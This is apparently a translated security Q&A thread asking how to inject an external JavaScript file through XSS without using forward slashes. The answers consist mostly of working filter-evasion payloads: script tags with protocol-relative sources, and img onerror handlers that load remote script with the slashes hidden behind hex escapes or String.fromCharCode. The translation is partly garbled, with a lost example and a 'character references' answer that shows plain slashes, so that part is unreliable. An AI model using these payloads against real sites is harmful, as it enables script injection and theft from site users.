esiste un vettore di attacco XSS che consente l'inclusione di un file .js esterno senza dover utilizzare le barre in avanti?
diciamo che il percorso del file è somewebsite.com/js/xss.js
C'è un modo per passarlo a un parametro che funzioni e senza di esso contenere barre in avanti
Un esempio che non funzionerebbe è: %codice% Funziona bene perché non devo chiudere il tag ma non funziona anche perché devo usare le barre in avanti per navigare nel file JS
Puoi sempre usare i riferimenti ai caratteri:
<script src='//somewebsite.com/js/xss.js'>
Funziona anche senza virgolette:
<script src=//somewebsite.com/js/xss.js>
Potresti anche usare JavaScript per iniettare l'elemento script e generare il carattere / con JavaScript in qualche modo:
<img src="" onerror="s=document.createElement('script'); s.src='\x2F\x2Fsomewebsite.com\x2Fjs\x2Fxss.js'; document.body.appendChild(s)">
E senza virgolette:
<img src= onerror=s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.src=String.fromCharCode(47,47,115,111,109,101,119,101,98,115,105,116,101,46,99,111,109,47,106,115,47,120,115,115,46,106,115);document.body.appendChild(s)>
Leggi altre domande sui tag php web-application xss